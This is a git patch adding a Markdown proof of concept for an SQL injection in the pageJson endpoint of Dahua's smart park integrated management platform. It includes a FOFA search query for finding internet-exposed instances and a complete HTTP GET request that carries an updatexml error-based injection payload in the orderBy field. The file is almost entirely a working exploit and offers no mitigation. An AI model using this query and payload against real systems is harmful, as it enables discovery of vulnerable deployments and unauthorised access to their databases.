From 46328ce16447b7b9d6dba9515cc7b55f2688c18e Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Thu, 14 Mar 2024 16:25:06 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E5=A4=A7=E5=8D=8E=E6=99=BA=E6=85=A7?= =?UTF-8?q?=E5=9B=AD=E5=8C=BA=E7=BB=BC=E5=90=88=E7=AE=A1=E7=90=86=E5=B9=B3?= =?UTF-8?q?=E5=8F=B0pageJson=E5=AD=98=E5=9C=A8SQL=E6=B3=A8=E5=85=A5?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...智慧园区综合管理平台pageJson存在SQL注入漏洞.md | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 大华智慧园区综合管理平台pageJson存在SQL注入漏洞.md diff --git a/大华智慧园区综合管理平台pageJson存在SQL注入漏洞.md b/大华智慧园区综合管理平台pageJson存在SQL注入漏洞.md new file mode 100644 index 0000000..8100566 --- /dev/null +++ b/大华智慧园区综合管理平台pageJson存在SQL注入漏洞.md @@ -0,0 +1,16 @@ +## 大华智慧园区综合管理平台pageJson存在SQL注入漏洞 + + +## fofa +``` +app="dahua-智慧园区综合管理平台" +``` + +## poc +``` +GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) +Accept: */* +Connection: Keep-Alive +```